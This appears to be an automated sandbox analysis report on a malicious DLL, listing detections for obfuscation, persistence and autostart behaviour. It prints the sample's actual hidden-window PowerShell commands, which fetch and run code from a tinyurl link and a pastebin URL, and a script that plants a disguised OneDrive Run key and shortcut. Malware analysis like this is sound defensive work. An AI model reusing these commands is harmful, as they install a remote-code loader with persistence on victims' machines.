Source: Binary string: ws\System.Management.Automation.pdbpdb+Z source: powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B75C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbM source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbT source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb^A source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000018.00000002.2408826051.000001B769F02000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb[ source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{4 source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: &C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbG source: powershell.exe, 0000000D.00000002.1783891772.000002476FA01000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ment.Automation.pdb! source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbM source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089u source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 56ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb!4Z source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb"fru source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: 5UIy3bo46y.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5UIy3bo46y.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5UIy3bo46y.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5UIy3bo46y.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5UIy3bo46y.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Obfuscated command line found
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: 5UIy3bo46y.dllStatic PE information: section name: _RDATA
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB53752B push ebx; iretd 7_2_00007FFAAB53756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB510C3B push ebp; ret 20_2_00007FFAAB510C3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB5E7BCA pushad ; ret 20_2_00007FFAAB5E7BCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB5E6DC3 push edi; iretd 20_2_00007FFAAB5E6DC6

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
